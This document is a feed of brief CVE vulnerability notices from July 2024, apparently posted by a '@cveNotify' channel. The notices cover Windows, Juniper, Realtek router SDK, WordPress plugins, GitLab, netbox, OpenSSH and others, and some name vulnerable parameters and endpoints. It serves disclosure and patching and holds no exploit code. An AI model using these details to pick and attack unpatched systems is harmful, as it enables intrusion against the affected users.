| 2024-07-11 18:07:24 |
🚨 CVE-2005-1394Format string vulnerability in ArcGIS for ESRI ArcInfo Workstation 9.0 allows local users to gain privileges via format string specifiers in the ARCHOME environment variable to (1) wservice or (2) lockmgr.🎖@cveNotify |
|
| 2024-07-11 17:07:36 |
🚨 CVE-2024-38070Windows LockDown Policy (WLDP) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-11 17:07:35 |
🚨 CVE-2024-38067Windows Online Certificate Status Protocol (OCSP) Server Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-07-11 17:07:31 |
🚨 CVE-2024-38065Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-11 17:07:30 |
🚨 CVE-2024-38027Windows Line Printer Daemon Service Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-07-11 17:07:29 |
🚨 CVE-2024-38025Microsoft Windows Performance Data Helper Library Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-11 17:07:26 |
🚨 CVE-2024-38024Microsoft SharePoint Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-11 17:07:25 |
🚨 CVE-2024-38021Microsoft Outlook Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-11 17:07:24 |
🚨 CVE-2024-38020Microsoft Outlook Spoofing Vulnerability🎖@cveNotify |
|
| 2024-07-11 16:37:43 |
🚨 CVE-2024-39521An Improper Neutralization of Special Elements vulnerability in Juniper Networks Junos OS Evolved commands allows a local, authenticated attacker with low privileges to escalate their privileges to 'root' leading to a full compromise of the system.The Junos OS Evolved CLI doesn't properly handle command options in some cases, allowing users which execute specific CLI commands with a crafted set of parameters to escalate their privileges to root on shell level.This issue affects Junos OS Evolved: * 21.1-EVO versions 21.1R1-EVO and later before 21.2R3-S8-EVO, * 21.4-EVO versions before 21.4R3-S7-EVO, * 22.1-EVO versions before 22.1R3-S6-EVO, * 22.2-EVO versions before 22.2R3-EVO, * 22.3-EVO versions before 22.3R2-EVO.🎖@cveNotify |
|
| 2024-07-11 16:37:42 |
🚨 CVE-2024-39520An Improper Neutralization of Special Elements vulnerability in Juniper Networks Junos OS Evolved commands allows a local, authenticated attacker with low privileges to escalate their privileges to 'root' leading to a full compromise of the system.The Junos OS Evolved CLI doesn't properly handle command options in some cases, allowing users which execute specific CLI commands with a crafted set of parameters to escalate their privileges to root on shell level.This issue affects Junos OS Evolved: * All version before 20.4R3-S6-EVO, * 21.2-EVO versions before 21.2R3-S4-EVO, * 21.4-EVO versions before 21.4R3-S6-EVO, * 22.2-EVO versions before 22.2R2-S1-EVO, 22.2R3-EVO, * 22.3-EVO versions before 22.3R2-EVO.🎖@cveNotify |
|
| 2024-07-11 16:37:41 |
🚨 CVE-2024-39317Wagtail is an open source content management system built on Django. A bug in Wagtail's `parse_query_string` would result in it taking a long time to process suitably crafted inputs. When used to parse sufficiently long strings of characters without a space, `parse_query_string` would take an unexpectedly large amount of time to process, resulting in a denial of service. In an initial Wagtail installation, the vulnerability can be exploited by any Wagtail admin user. It cannot be exploited by end users. If your Wagtail site has a custom search implementation which uses `parse_query_string`, it may be exploitable by other users (e.g. unauthenticated users). Patched versions have been released as Wagtail 5.2.6, 6.0.6 and 6.1.3.🎖@cveNotify |
|
| 2024-07-11 16:37:37 |
🚨 CVE-2024-32753Under certain circumstances the camera may be susceptible to known vulnerabilities associated with the JQuery versions prior to 3.5.0 third-party component🎖@cveNotify |
|
| 2024-07-11 16:07:44 |
🚨 CVE-2023-50383Three os command injection vulnerabilities exist in the boa formWsc functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of HTTP requests can lead to arbitrary command execution. An attacker can send a series of HTTP requests to trigger these vulnerabilities.This command injection is related to the `localPin` request's parameter.🎖@cveNotify |
|
| 2024-07-11 16:07:43 |
🚨 CVE-2023-50381Three os command injection vulnerabilities exist in the boa formWsc functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of HTTP requests can lead to arbitrary command execution. An attacker can send a series of HTTP requests to trigger these vulnerabilities.This command injection is related to the `targetAPSsid` request's parameter.🎖@cveNotify |
|
| 2024-07-11 16:07:42 |
🚨 CVE-2023-50244Two stack-based buffer overflow vulnerabilities exist in the boa formIpQoS functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can send a series of HTTP requests to trigger these vulnerabilities.This stack-based buffer overflow is related to the `entry_name` request's parameter.🎖@cveNotify |
|
| 2024-07-11 16:07:38 |
🚨 CVE-2023-50240Two stack-based buffer overflow vulnerabilities exist in the boa set_RadvdInterfaceParam functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This stack-based buffer overflow is related to the `AdvDefaultPreference` request's parameter.🎖@cveNotify |
|
| 2024-07-11 16:07:37 |
🚨 CVE-2023-49867A stack-based buffer overflow vulnerability exists in the boa formWsc functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can send a series of HTTP requests to trigger this vulnerability.🎖@cveNotify |
|
| 2024-07-11 16:07:36 |
🚨 CVE-2023-49595A stack-based buffer overflow vulnerability exists in the boa rollback_control_code functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of network requests can lead to arbitrary code execution. An attacker can send a sequence of requests to trigger this vulnerability.🎖@cveNotify |
|
| 2024-07-11 16:07:32 |
🚨 CVE-2023-49073A stack-based buffer overflow vulnerability exists in the boa formFilter functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of HTTP requests can lead to arbitrary code execution. An attacker can send a sequence of requests to trigger this vulnerability.🎖@cveNotify |
|
| 2024-07-11 16:07:31 |
🚨 CVE-2023-47677A cross-site request forgery (csrf) vulnerability exists in the boa CSRF protection functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted network request can lead to CSRF. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-07-11 16:07:27 |
🚨 CVE-2023-46685A hard-coded password vulnerability exists in the telnetd functionality of LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623. A set of specially crafted network packets can lead to arbitrary command execution.🎖@cveNotify |
|
| 2024-07-11 16:07:26 |
🚨 CVE-2023-41251A stack-based buffer overflow vulnerability exists in the boa formRoute functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-07-11 16:07:25 |
🚨 CVE-2023-34435A firmware update vulnerability exists in the boa formUpload functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted network packets can lead to arbitrary firmware update. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-07-11 15:07:43 |
🚨 CVE-2024-23736Cross Site Request Forgery (CSRF) vulnerability in savignano S/Notify before 4.0.2 for Confluence allows attackers to manipulate a user's S/MIME certificate of PGP key via malicious link or email.🎖@cveNotify |
|
| 2024-07-11 15:07:42 |
🚨 CVE-2024-39001ag-grid-enterprise v31.3.2 was discovered to contain a prototype pollution via the component _ModuleSupport.jsonApply. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-11 15:07:41 |
🚨 CVE-2024-38987aofl cli-lib v3.14.0 was discovered to contain a prototype pollution via the component defaultsDeep. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-11 15:07:38 |
🚨 CVE-2024-39828R74n Sandboxels 1.9 through 1.9.5 allows XSS via a message in a modified saved-game file. This was fixed in a hotfix to 1.9.5 on 2024-06-29.🎖@cveNotify |
|
| 2024-07-11 15:07:37 |
🚨 CVE-2024-23767An issue was discovered on HMS Anybus X-Gateway AB7832-F firmware version 3. The HICP protocol allows unauthenticated changes to a device's network configurations.🎖@cveNotify |
|
| 2024-07-11 15:07:36 |
🚨 CVE-2024-21740Artery AT32F415CBT7 and AT32F421C8T7 devices have Incorrect Access Control.🎖@cveNotify |
|
| 2024-07-11 15:07:32 |
🚨 CVE-2020-27352When generating the systemd service units for the docker snap (and other similar snaps), snapd does not specify Delegate=yes - as a result systemd will move processes from the containers created and managed by these snaps into the cgroup of the main daemon within the snap itself when reloading system units. This may grant additional privileges to a container within the snap that were not originally intended.🎖@cveNotify |
|
| 2024-07-11 15:07:31 |
🚨 CVE-2024-29849Veeam Backup Enterprise Manager allows unauthenticated users to log in as any user to enterprise manager web interface.🎖@cveNotify |
|
| 2024-07-11 15:07:30 |
🚨 CVE-2024-2659A command injection vulnerability was identified in SMM/SMM2 and FPC that could allow an authenticated user with elevated privileges to execute system commands when performing a specific administrative function.🎖@cveNotify |
|
| 2024-07-11 15:07:27 |
🚨 CVE-2023-6494The WPC Smart Quick View for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-07-11 15:07:26 |
🚨 CVE-2023-44853\An issue was discovered in Cobham SAILOR VSAT Ku v.164B019, allows a remote attacker to execute arbitrary code via a crafted script to the sub_219C4 function in the acu_web file.🎖@cveNotify |
|
| 2024-07-11 15:07:25 |
🚨 CVE-2023-45919Mesa 23.0.4 was discovered to contain a buffer over-read in glXQueryServerString(). NOTE: this is disputed because there are no common situations in which users require uninterrupted operation with an attacker-controller server.🎖@cveNotify |
|
| 2024-07-11 14:07:32 |
🚨 CVE-2024-32894In bc_get_converted_received_bearer of bc_utilities.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-07-11 14:07:26 |
🚨 CVE-2024-32893In _s5e9865_mif_set_rate of exynos_dvfs.c, there is a possible out of bounds read due to improper casting. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-07-11 14:07:25 |
🚨 CVE-2024-29787In lwis_process_transactions_in_queue of lwis_transaction.c, there is a possible use after free due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-07-11 14:07:24 |
🚨 CVE-2024-29784In prepare_response of lwis_periodic_io.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-07-11 13:37:25 |
🚨 CVE-2024-37541Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in StaxWP Elementor Addons, Widgets and Enhancements – Stax allows Stored XSS.This issue affects Elementor Addons, Widgets and Enhancements – Stax: from n/a through 1.4.4.1.🎖@cveNotify |
|
| 2024-07-11 13:37:24 |
🚨 CVE-2024-37539Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Delower WP To Do allows Stored XSS.This issue affects WP To Do: from n/a through 1.3.0.🎖@cveNotify |
|
| 2024-07-11 13:07:44 |
🚨 CVE-2024-20783InDesign Desktop versions ID19.3, ID18.5.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-07-11 13:07:43 |
🚨 CVE-2024-20781InDesign Desktop versions ID19.3, ID18.5.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-07-11 13:07:38 |
🚨 CVE-2024-40038idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/userScore_deal.php?mudi=rev🎖@cveNotify |
|
| 2024-07-11 13:07:37 |
🚨 CVE-2024-40035idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/userLevel_deal.php?mudi=add.🎖@cveNotify |
|
| 2024-07-11 13:07:32 |
🚨 CVE-2024-39899PrivateBin is an online pastebin where the server has zero knowledge of pasted data. In v1.5, PrivateBin introduced the YOURLS server-side proxy. The idea was to allow using the YOURLs URL shortener without running the YOURLs instance without authentication and/or exposing the authentication token to the public, allowing anyone to shorten any URL. With the proxy mechanism, anyone can shorten any URL pointing to the configured PrivateBin instance. The vulnerability allowed other URLs to be shortened, as long as they contain the PrivateBin instance, defeating the limit imposed by the proxy. This vulnerability is fixed in 1.7.4.🎖@cveNotify |
|
| 2024-07-11 13:07:31 |
🚨 CVE-2024-38517Tencent RapidJSON is vulnerable to privilege escalation due to an integer underflow in the `GenericReader::ParseNumber()` function of `include/rapidjson/reader.h` when parsing JSON text from a stream. An attacker needs to send the victim a crafted file which needs to be opened; this triggers the integer underflow vulnerability (when the file is parsed), leading to elevation of privilege.🎖@cveNotify |
|
| 2024-07-11 13:07:26 |
🚨 CVE-2024-34123Premiere Pro versions 23.6.5, 24.4.1 and earlier are affected by an Untrusted Search Path vulnerability that could lead to arbitrary code execution. An attacker could exploit this vulnerability by inserting a malicious file into the search path, which the application might execute instead of the legitimate file. This could occur when the application uses a search path to locate executables or libraries. Exploitation of this issue requires user interaction, attack complexity is high.🎖@cveNotify |
|
| 2024-07-11 13:07:25 |
🚨 CVE-2023-50805A vulnerability was discovered in Samsung Mobile Processor, Wearable Processor, and Modems with versions Exynos 9820, Exynos 9825, Exynos 980, Exynos 990, Exynos 850, Exynos 1080, Exynos 2100, Exynos 2200, Exynos 1280, Exynos 1380, Exynos 1330, Exynos 9110, Exynos W920, Exynos W930, Exynos Modem 5123, Exynos Modem 5300 that allows an out-of-bounds write in the heap in 2G (no auth).🎖@cveNotify |
|
| 2024-07-11 11:37:24 |
🚨 CVE-2024-6035A Stored Cross-Site Scripting (XSS) vulnerability exists in gaizhenbiao/chuanhuchatgpt version 20240410. This vulnerability allows an attacker to inject malicious JavaScript code into the chat history file. When a victim uploads this file, the malicious script is executed in the victim's browser. This can lead to user data theft, session hijacking, malware distribution, and phishing attacks.🎖@cveNotify |
|
| 2024-07-11 09:37:26 |
🚨 CVE-2024-5681CWE-20: Improper Input Validation vulnerability exists that could cause local denial-of-service,privilege escalation, and potentially kernel execution when a malicious actor with local useraccess crafts a script/program using an IOCTL call in the Foxboro.sys driver.🎖@cveNotify |
|
| 2024-07-11 09:37:25 |
🚨 CVE-2024-5679CWE-787: Out-of-Bounds Write vulnerability exists that could cause local denial-of-service, orkernel memory leak when a malicious actor with local user access crafts a script/program usingan IOCTL call in the Foxboro.sys driver.🎖@cveNotify |
|
| 2024-07-11 09:37:24 |
🚨 CVE-2024-2602CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('PathTraversal') vulnerability exists that could result in remote code execution when an authenticateduser executes a saved project file that has been tampered by a malicious actor.🎖@cveNotify |
|
| 2024-07-11 08:37:24 |
🚨 CVE-2024-38433Nuvoton - CWE-305: Authentication Bypass by Primary WeaknessAn attacker with write access to the SPI-Flash on an NPCM7xx BMC subsystem that uses the Nuvoton BootBlockreference code can modify the u-boot image header on flash parsed by the BootBlock which could lead to arbitrary codeexecution.🎖@cveNotify |
|
| 2024-07-11 07:37:30 |
🚨 CVE-2024-6666The WP ERP plugin for WordPress is vulnerable to SQL Injection via the ‘vendor_id’ parameter in all versions up to, and including, 1.13.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Accounting Manager access (erp_ac_view_sales_summary capability) and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-07-11 07:37:29 |
🚨 CVE-2024-6624The JSON API User plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.9.3. This is due to improper controls on custom user meta fields. This makes it possible for unauthenticated attackers to register as administrators on the site. The plugin requires the JSON API plugin to also be installed.🎖@cveNotify |
|
| 2024-07-11 07:37:26 |
🚨 CVE-2024-6385An issue was discovered in GitLab CE/EE affecting all versions starting from 15.8 prior to 16.11.6, starting from 17.0 prior to 17.0.4, and starting from 17.1 prior to 17.1.2, which allows an attacker to trigger a pipeline as another user under certain circumstances.🎖@cveNotify |
|
| 2024-07-11 07:37:25 |
🚨 CVE-2024-5257An issue was discovered in GitLab CE/EE affecting all versions starting from 17.0 prior to 17.0.4 and from 17.1 prior to 17.1.2 where a Developer user with `admin_compliance_framework` custom role may have been able to modify the URL for a group namespace.🎖@cveNotify |
|
| 2024-07-11 07:37:24 |
🚨 CVE-2024-2880An issue was discovered in GitLab CE/EE affecting all versions starting from 16.5 prior to 16.11.6, starting from 17.0 prior to 17.0.4, and starting from 17.1 prior to 17.1.2 in which a user with `admin_group_member` custom role permission could ban group members.🎖@cveNotify |
|
| 2024-07-11 06:37:30 |
🚨 CVE-2024-6138The Secure Copy Content Protection and Content Locking WordPress plugin before 4.0.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-07-11 06:37:29 |
🚨 CVE-2024-6026The Slider by 10Web WordPress plugin before 1.2.56 does not sanitise and escape some of its Slide options, which could allow authenticated users with access to the Sliders (by default Administrator, however this can be changed via the Slider by 10Web WordPress plugin before 1.2.56's options) and the ability to add images (Editor+) to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-11 06:37:26 |
🚨 CVE-2024-6025The Quiz and Survey Master (QSM) WordPress plugin before 9.0.5 does not sanitise and escape some of its Quiz settings, which could allow contributors and higher to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-11 06:37:25 |
🚨 CVE-2024-1845The VikRentCar Car Rental Management System WordPress plugin before 1.3.2 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks🎖@cveNotify |
|
| 2024-07-11 06:37:24 |
🚨 CVE-2023-51103A floating point exception (divide-by-zero) vulnerability was discovered in Artifex MuPDF 1.23.4 in the function fz_new_pixmap_from_float_data() of pixmap.c.🎖@cveNotify |
|
| 2024-07-11 05:37:24 |
🚨 CVE-2024-22280VMware Aria Automation does not apply correct input validation which allows for SQL-injection in the product. An authenticated malicious user could enter specially crafted SQL queries and perform unauthorised read/write operations in the database.🎖@cveNotify |
|
| 2024-07-11 04:37:30 |
🚨 CVE-2024-6397The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 0.1.0.44. This is due to insufficient verification of the API key. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username, and to perform a variety of other administrative tasks. NOTE: This vulnerability was partially fixed in 0.1.0.44, but was still exploitable via Cross-Site Request Forgery.🎖@cveNotify |
|
| 2024-07-11 04:37:29 |
🚨 CVE-2024-0619The Payflex Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the payment_callback() function in all versions up to, and including, 2.5.0. This makes it possible for unauthenticated attackers to update the status of orders, which can potentially lead to revenue loss.🎖@cveNotify |
|
| 2024-07-11 04:37:26 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-11 04:37:25 |
🚨 CVE-2024-33327A cross-site scripting (XSS) vulnerability in the component UrlAccessibilityEvaluation.jsp of Lumisxp v15.0.x to v16.1.x allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the contentHtml parameter.🎖@cveNotify |
|
| 2024-07-11 04:37:24 |
🚨 CVE-2024-33326A cross-site scripting (XSS) vulnerability in the component XsltResultControllerHtml.jsp of Lumisxp v15.0.x to v16.1.x allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the lumPageID parameter.🎖@cveNotify |
|
| 2024-07-11 03:37:30 |
🚨 CVE-2024-6676A vulnerability has been found in witmy my-springsecurity-plus up to 2024-07-03 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /api/user. The manipulation of the argument params.dataScope leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-271111.🎖@cveNotify |
|
| 2024-07-11 03:37:29 |
🚨 CVE-2024-6210The Duplicator plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 1.5.9. This makes it possible for unauthenticated attackers to obtain the full path to instances, which they may be able to use in combination with other vulnerabilities or to simplify reconnaissance work. On its own, this information is of very limited use.🎖@cveNotify |
|
| 2024-07-11 03:37:26 |
🚨 CVE-2024-23317External Control of File Name or Path (CWE-73) in the Controller 6000 and Controller 7000 allows an attacker with local access to the Controller to perform arbitrary code execution. This issue affects: 9.10 prior to vCR9.10.240520a (distributed in 9.10.1268(MR1)), 9.00 prior to vCR9.00.240521a (distributed in 9.00.1990(MR3)), 8.90 prior to vCR8.90.240520a (distributed in 8.90.1947 (MR4)), 8.80 prior to vCR8.80.240520a (distributed in 8.80.1726 (MR5)), 8.70 prior to vCR8.70.240520a (distributed in 8.70.2824 (MR7)), all versions of 8.60 and prior.🎖@cveNotify |
|
| 2024-07-11 03:37:25 |
🚨 CVE-2024-22387External Control of Critical State Data (CWE-642) in the Controller 6000 and Controller 7000 diagnostic web interface allows an authenticated user to modify device I/O connections leading to unexpected behavior that in some circumstances could compromise site physical security controls. Gallagher recommend the diagnostic web page is not enabled (default is off) unless advised by Gallagher Technical support. This interface is intended only for diagnostic purposes.This issue affects: Gallagher Controller 6000 and 7000 9.10 prior to vCR9.10.240520a (distributed in 9.10.1268(MR1)), 9.00 prior to vCR9.00.240521a (distributed in 9.00.1990(MR3)), 8.90 prior to vCR8.90.240520a (distributed in 8.90.1947 (MR4)), 8.80 prior to vCR8.80.240520a (distributed in 8.80.1726 (MR5)), 8.70 prior to vCR8.70.240520a (distributed in 8.70.2824 (MR7)), all versions of 8.60 and prior.🎖@cveNotify |
|
| 2024-07-11 03:37:24 |
🚨 CVE-2016-15039A vulnerability classified as critical was found in mhuertos phpLDAPadmin up to 665dbc2690ebeb5392d38f1fece0a654225a0b38. Affected by this vulnerability is the function makeHttpRequest of the file htdocs/js/ajax_functions.js. The manipulation leads to http request smuggling. The attack can be launched remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named dd6e9583a2eb2ca085583765e8a63df5904cb036. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-270523.🎖@cveNotify |
|
| 2024-07-11 03:07:43 |
🚨 CVE-2024-40736A cross-site scripting (XSS) vulnerability in netbox v4.0.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter at /dcim/power-outlets/add.🎖@cveNotify |
|
| 2024-07-11 03:07:37 |
🚨 CVE-2024-40735A cross-site scripting (XSS) vulnerability in netbox v4.0.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter at /dcim/power-outlets/{id}/edit/.🎖@cveNotify |
|
| 2024-07-11 03:07:36 |
🚨 CVE-2024-40732A cross-site scripting (XSS) vulnerability in netbox v4.0.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter at /dcim/rear-ports/add/.🎖@cveNotify |
|
| 2024-07-11 03:07:35 |
🚨 CVE-2024-40731A cross-site scripting (XSS) vulnerability in netbox v4.0.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter at /dcim/rear-ports/{id}/edit/.🎖@cveNotify |
|
| 2024-07-11 03:07:31 |
🚨 CVE-2024-40729A cross-site scripting (XSS) vulnerability in netbox v4.0.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter at /dcim/interfaces/add/.🎖@cveNotify |
|
| 2024-07-11 03:07:30 |
🚨 CVE-2024-40726A cross-site scripting (XSS) vulnerability in netbox v4.0.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter at /dcim/power-ports/{id}/edit/.🎖@cveNotify |
|
| 2024-07-11 03:07:26 |
🚨 CVE-2024-3558The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the the 'cfs[post_title]' parameter versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-11 03:07:25 |
🚨 CVE-2024-38348CodeProjects Health Care hospital Management System v1.0 was discovered to contain a SQL injection vulnerability in the Staff Info module via the searvalu parameter.🎖@cveNotify |
|
| 2024-07-11 03:07:24 |
🚨 CVE-2024-38347CodeProjects Health Care hospital Management System v1.0 was discovered to contain a SQL injection vulnerability in the Room Information module via the id parameter.🎖@cveNotify |
|
| 2024-07-11 02:37:24 |
🚨 CVE-2024-40618Whale browser before 3.26.244.21 allows an attacker to execute malicious JavaScript due to improper sanitization when processing a built-in extension.🎖@cveNotify |
|
| 2024-07-11 01:37:24 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-11 00:37:25 |
🚨 CVE-2024-6447The FULL – Cliente plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the license plan parameter in all versions up to, and including, 3.1.12 due to insufficient input sanitization and output escaping as well as missing authorization and capability checks on the related functions. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that will execute whenever an administrative user accesses wp-admin dashboard🎖@cveNotify |
|
| 2024-07-11 00:37:24 |
🚨 CVE-2024-39554A Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Juniper Networks Junos OS Evolved allows an unauthenticated, network-based attacker to inject incremental routing updates when BGP multipath is enabled, causing rpd to crash and restart, resulting in a Denial of Service (DoS). Since this is a timing issue (race condition), the successful exploitation of this vulnerability is outside the attacker's control. However, continued receipt and processing of this packet may create a sustained Denial of Service (DoS) condition.On all Junos OS and Junos OS Evolved platforms with BGP multipath enabled, a specific multipath calculation removes the original next hop from the multipath lead routes nexthop-set. When this change happens, multipath relies on certain internal timing to record the update. Under certain circumstance and with specific timing, this could result in an rpd crash.This issue only affects systems with BGP multipath enabled.This issue affects:Junos OS: * All versions of 21.1 * from 21.2 before 21.2R3-S7, * from 21.4 before 21.4R3-S6, * from 22.1 before 22.1R3-S5, * from 22.2 before 22.2R3-S3, * from 22.3 before 22.3R3-S2, * from 22.4 before 22.4R3, * from 23.2 before 23.2R2.Junos OS Evolved: * All versions of 21.1-EVO, * All versions of 21.2-EVO, * from 21.4-EVO before 21.4R3-S6-EVO, * from 22.1-EVO before 22.1R3-S5-EVO, * from 22.2-EVO before 22.2R3-S3-EVO, * from 22.3-EVO before 22.3R3-S2-EVO, * from 22.4-EVO before 22.4R3-EVO, * from 23.2-EVO before 23.2R2-EVO.Versions of Junos OS before 21.1R1 are unaffected by this vulnerability.Versions of Junos OS Evolved before 21.1R1-EVO are unaffected by this vulnerability.🎖@cveNotify |
|
| 2024-07-10 23:37:32 |
🚨 CVE-2024-39513An Improper Input Validation vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS Evolved allows a local, low-privileged attacker to cause a Denial of Service (DoS).When a specific "clear" command is run, the Advanced Forwarding Toolkit manager (evo-aftmand-bt or evo-aftmand-zx) crashes and restarts.The crash impacts all traffic going through the FPCs, causing a DoS. Running the command repeatedly leads to a sustained DoS condition.This issue affects Junos OS Evolved: * All versions before 20.4R3-S9-EVO, * from 21.2-EVO before 21.2R3-S7-EVO, * from 21.3-EVO before 21.3R3-S5-EVO, * from 21.4-EVO before 21.4R3-S6-EVO, * from 22.1-EVO before 22.1R3-S4-EVO, * from 22.2-EVO before 22.2R3-S3-EVO, * from 22.3-EVO before 22.3R3-S3-EVO, * from 22.4-EVO before 22.4R3-EVO, * from 23.2-EVO before 23.2R2-EVO.🎖@cveNotify |
|
| 2024-07-10 23:37:26 |
🚨 CVE-2024-39512An Improper Physical Access Control vulnerability in the console port control of Juniper Networks Junos OS Evolved allows an attacker with physical access to the device to get access to a user account.When the console cable is disconnected, the logged in user is not logged out. This allows a malicious attacker with physical access to the console to resume a previous session and possibly gain administrative privileges.This issue affects Junos OS Evolved: * from 23.2R2-EVO before 23.2R2-S1-EVO, * from 23.4R1-EVO before 23.4R2-EVO.🎖@cveNotify |
|
| 2024-07-10 23:37:25 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-10 23:37:24 |
🚨 CVE-2023-41915OpenPMIx PMIx before 4.2.6 and 5.0.x before 5.0.1 allows attackers to obtain ownership of arbitrary files via a race condition during execution of library code with UID 0.🎖@cveNotify |
|
| 2024-07-10 22:37:25 |
